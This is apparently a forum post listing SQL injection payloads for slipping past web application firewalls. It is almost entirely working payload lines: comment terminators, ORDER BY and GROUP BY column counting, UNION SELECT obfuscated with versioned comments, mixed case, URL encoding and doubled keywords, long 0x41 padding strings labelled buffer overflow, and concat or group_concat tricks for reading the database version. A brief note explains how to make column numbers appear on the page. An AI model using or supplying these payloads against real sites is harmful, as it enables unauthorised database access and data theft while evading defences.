کد:
—'- : +--+ / : — - : —+- : /* ) order by 1— - ') order by 1— - ')order by 1%23%23 %')order by 1%23%23 Null' order by 100--+ Null' order by 9999--+ ')group by 99— - 'group by 119449— - 'group/**/by/**/99%23%23 '+order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,8 4,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99 +--+ union select ByPassing method +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+ +/*!u%6eion*/+/*!se%6cect*/+ /**/uniUNIONon/**/aALLll/**/selSELECTect/**/ 1%')and(0)union(select(1),version(),3,4,5,6)%23%23 %23 /*!50000%55nIoN*/+/*!50000%53eLeCt*/ union /*!50000%53elect*/ %55nion %53elect +--+Union+--+Select+--+ +UnIoN/*&a=*/SeLeCT/*&a=*/ id=1+’UnI”On’+'SeL”ECT’ <-MySQL only id=1+'UnI'||'on'+SeLeCT' <-MSSQL only UnIoN SeLeCt CoNcAt(version())— uNiOn aLl sElEcT uUNIONnion all sSELECTelect :: Buffer Overflow :: +And(select 1)=(select 0x414)+union+select+1— +And(select 1)=(select 0xAAAA)+union+select+1— +And(select 1)=(select 0x414141414141414141414141414141414141414141414141 4141414141414141414141414 1414141414141414141414 14141414141414141414141414141414141414141414141414 14141414 141414141414141414141414141414141414141 41414141414141414141414141414141414141414 141414 14141414141414141414141414141414141414141414141414 141414141414141414141414 14141414141414141414141 41414141414141414141414141414141414141414141414141 4141414 1414141414141414141414141414141414141414 1414141414141414141414141414141414141414 1414141 41414141414141414141414141414141414141414141414141 41414141414141414141414 141414141414141414141414 14141414141414141414141414141414141414141414141414 141414 14141414141414141414141414141414141414141 414141414141414141414141414141414141414 1414141) + +and (/*!select*/ 1)=(/*!select*/ 0xAA)+ :: 400 Bad Request :: —+%0A union+select+1--+%0A,2--+%0A,3--+%0A,4--+%0A,5--+%0A — null the parameter id=-1 id=null id=1+and+false+ id=9999 id=1 and 0 id==1 id=(-1) Group_Concat Group_Concat group_concat() /*!group_concat*/() grOUp_ConCat(/*!*/,0x3e,/*!*/) group_concat(,0x3c62723e) g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose %22%29 CoNcAt() CONCAT(DISTINCT Version()) concat(,0x3a,) concat%00() %00CoNcAt() /*!50000cOnCat*/(/*!Version()*/) /*!50000cOnCat*/ /**//*!12345cOnCat*/(,0x3a,) concat_ws() concat(0x3a,,0x3c62723e) /*!concat_ws(0x3a,)*/ concat_ws(0x3a3a3a,version() CONCAT_WS(CHAR(32,58,32),version(),) REVERSE(tacnoc) binary(version()) uncompress(compress(version())) aes_decrypt(aes_encrypt(version(),1),1) To appear column numbr in page put after id id=1+and+1=0+union+select+1,2,3,4,5,6 +AND+1=0 /*!aND*/ 1 like 0 +/*!and*/+1=0 +and+2>3+ +and(1)=(0) and (1)!=(0) +div+0 Having+1=0 function ByPassing unhex(hex(value)) cast(value as char) uncompress(compress(version())) cast(version() as char) aes_decrypt(aes_encrypt(version(),1),1)